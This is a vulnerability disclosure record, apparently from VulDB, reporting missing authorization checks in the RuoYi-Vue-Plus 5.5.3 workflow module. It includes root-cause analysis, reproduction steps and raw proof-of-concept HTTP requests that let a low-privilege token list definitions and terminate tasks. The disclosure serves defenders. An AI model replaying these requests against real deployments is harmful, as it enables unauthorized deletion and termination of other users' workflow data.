| Título | Dromara RuoYi-Vue-Plus 5.5.3 Privilege Escalation |
|---|
| Descripción | Dromara RuoYi-Vue-Plus v5.5.3 is vulnerable to Privilege Escalation in the Workflow module. The application fails to properly enforce object-level and function-level authorization checks on critical interfaces. Authenticated users with low privileges can bypass access controls to execute sensitive operations, such as deleting process instances, terminating tasks, and modifying task assignees, by directly invoking the API endpoints (e.g., /workflow/instance/deleteByInstanceIds). This issue stems from missing @SaCheckPermission annotations in FlwDefinitionController, FlwTaskController, and FlwInstanceController.
Vulnerability Type: CWE-862: Missing Authorization
code:https://gitee.com/dromara/RuoYi-Vue-Plus
http://github.com/dromara/RuoYi-Vue-Plus
Analysis: The SaServletFilter in SecurityConfig.java only verifies login status but does not enforce specific permissions for the Workflow module. Critical controllers (FlwDefinitionController, FlwTaskController, FlwInstanceController) lack the @SaCheckPermission annotation on sensitive write operations.
PoC (HTTP Request):
Reproduction Steps:
Log in as a low-privileged user (no workflow admin rights) and obtain an authorization token.
Send a DELETE request to /workflow/instance/deleteByInstanceIds/ with the ID of a process instance created by an administrator.
The server responds with 200 OK, and the target instance is deleted, confirming the privilege escalation.
GET /workflow/definition/list?pageNum=1&pageSize=10 HTTP/1.1
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: zh-CN,zh;q=0.9
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJsb2dpblR5cGUiOiJsb2dpbiIsImxvZ2luSWQiOiJzeXNfdXNlcjo0Iiwicm5TdHIiOiJ2TVpVY2ZiYXlVM3g0THF4SVk3N2REUG5Xb244N0EyWCIsImNsaWVudGlkIjoiZTVjZDdlNDg5MWJmOTVkMWQxOTIwNmNlMjRhN2IzMmUiLCJ0ZW5hbnRJZCI6IjAwMDAwMCIsInVzZXJJZCI6NCwidXNlck5hbWUiOiJ0ZXN0MSIsImRlcHRJZCI6MTAyLCJkZXB0TmFtZSI6IumVv-aymeWIhuWFrOWPuCIsImRlcHRDYXRlZ29yeSI6IiJ9.OUatQncTnbJHil5EqkbXgYRpj2PFjG02gkDxOdDHsNM
Connection: keep-alive
Content-Language: zh_CN
Cookie: PUBLICCMS_ANALYTICS_ID=db35d5f9-5a97-4e31-9f4b-e4d65d94cb13; PUBLICCMS_ADMIN=1_967744fc-9de7-4e7e-a32c-78e26cca27bb
Host: localhost:8080
Referer: http://localhost/demo/tree
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36
clientid: e5cd7e4891bf95d1d19206ce24a7b32e
sec-ch-ua: "Not(A:Brand";v="8", "Chromium";v="144", "Google Chrome";v="144"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
POST /workflow/task/terminationTask HTTP/1.1
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: zh-CN,zh;q=0.9
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJsb2dpblR5cGUiOiJsb2dpbiIsImxvZ2luSWQiOiJzeXNfdXNlcjo0Iiwicm5TdHIiOiJ2TVpVY2ZiYXlVM3g0THF4SVk3N2REUG5Xb244N0EyWCIsImNsaWVudGlkIjoiZTVjZDdlNDg5MWJmOTVkMWQxOTIwNmNlMjRhN2IzMmUiLCJ0ZW5hbnRJZCI6IjAwMDAwMCIsInVzZXJJZCI6NCwidXNlck5hbWUiOiJ0ZXN0MSIsImRlcHRJZCI6MTAyLCJkZXB0TmFtZSI6IumVv-aymeWIhuWFrOWPuCIsImRlcHRDYXRlZ29yeSI6IiJ9.OUatQncTnbJHil5EqkbXgYRpj2PFjG02gkDxOdDHsNM
Connection: keep-alive
Content-Language: zh_CN
Cookie: PUBLICCMS_ANALYTICS_ID=db35d5f9-5a97-4e31-9f4b-e4d65d94cb13; PUBLICCMS_ADMIN=1_967744fc-9de7-4e7e-a32c-78e26cca27bb
Host: localhost:8080
Referer: http://localhost/demo/tree
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36
clientid: e5cd7e4891bf95d1d19206ce24a7b32e
sec-ch-ua: "Not(A:Brand";v="8", "Chromium";v="144", "Google Chrome";v="144"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Content-Type: application/json
{"taskId":1,"comment":"poc"}
|
|---|
| Usuario | feng123123 (UID 95215) |
|---|
| Sumisión | 2026-02-06 10:30 (hace 4 meses) |
|---|
| Moderación | 2026-02-19 18:13 (13 days later) |
|---|
| Estado | Aceptado |
|---|
| Entrada de VulDB | 346944 [Dromara RuoYi-Vue-Plus hasta 5.5.3 Workflow deleteByInstanceIds SaServletFilter escalada de privilegios] |
|---|
| Puntos | 17 |
|---|